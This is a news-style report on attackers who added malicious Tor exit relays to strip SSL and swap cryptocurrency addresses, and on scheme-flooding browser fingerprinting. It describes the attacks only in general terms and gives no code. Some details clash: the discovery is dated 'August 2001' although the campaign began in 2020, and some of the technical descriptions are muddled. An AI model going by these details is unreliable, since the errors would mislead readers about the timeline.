Malicious actors have been adding their own servers to the Tor network since January 2020, generally for the purpose of intercepting traffic from users accessing cryptocurrentcy sites. Once the attackers add a server to the network, they mark it as an exit relay. This action anonymizes the traffic passing through the affected server before it enters the public internet. The techniques used to hijack these servers primarily include Secure Socket Layer (SSL) stripping and scheme flooding techniques.
Attackers have added thousands of malicious servers to the Tor network as of May 2021, which identify traffic on the network bound for sites that mix cryptocurrency. The stripping attacks changes this traffic’s connection from HTTPS to HTTP, meaning the connection data is no longer encrypted. Analysts believe the purpose of downgrading this traffic is to replace the addresses of cryptocurrency with their own, allowing attackers to profit from the financial transactions on those sites.
A security researcher known as Nusenu initially discovered the attacks in August 2001 while operating a Tor network. These first attacks consisted of flooding the network with malicious exit relays on three separate occasions, reaching about 23 percent of its exit capacity each time before administrators shut it down. The Tor Project quickly issued a series of recommendations for website operators and Tor Browser users to protect themselves against the attacks. This advice is particularly relevant to users accessing financial websites with Tor Browser.
Nusenu published additional findings in a May 2021 issue of The Record showing that the threat actor is continuing its attacks despite their public exposure. This researcher also stated that the attacks exceeded a quarter of the Tor network’s exit capacity on two occasions in 2021, peaking at 27 percent in February. Administrators detected the second wave of attacks and removed the malicious exit relays from the network, although these relays had been intercepting network traffic for at least weeks and possibly months.
The primary reasons for the success of these attacks over the past 16 months is because the threat actor has been adding malicious exit relays slowly, allowing them to remain unnoticed. However, they changed their tactics in May 2021 by attempting to bring all of their malicious servers online at the same time, likely as a result of administrators taking down their entire infrastructure once again. Administrators detected this most recent series of attacks within a day because it increased the Tor network’s exit capacity from 1,500 exit relays per day to over 2500, which Tor Project administrators couldn’t help but notice.
Nusenu added that the attackers still control about five percent of the network’s exit capacity as of May 5, 2021, despite the loss of over 1,000 of their servers. They also appear to be modifying downloads after the SSL strip attacks, although their exact actions are unclear. Attackers are also using other techniques like scheme flooding to tamper with network traffic.
The scheme flooding attacks against Tor users targets the Tor web browser in addition to some other desktop browsers. FingerprintJS, a fraud prevention organization, discovered this new fingerprinting technique earlier this year with the aid of its browser-fingerprinting library. The attack generates a consistent identifier on affected browsers, creating the possibility that a malicious actor could use that identifier to remove a user’s anonymity. This action could allow the actor to link a user’s browser history across multiple sessions and track their browsing activity.
These attacks are based on a vulnerability in the privacy settings of affected browsers that allows attackers to identify the applications that users have installed. It accomplishes this by exploiting URL schemes that cause certain web links to prompt the browser to open the applications associated with them.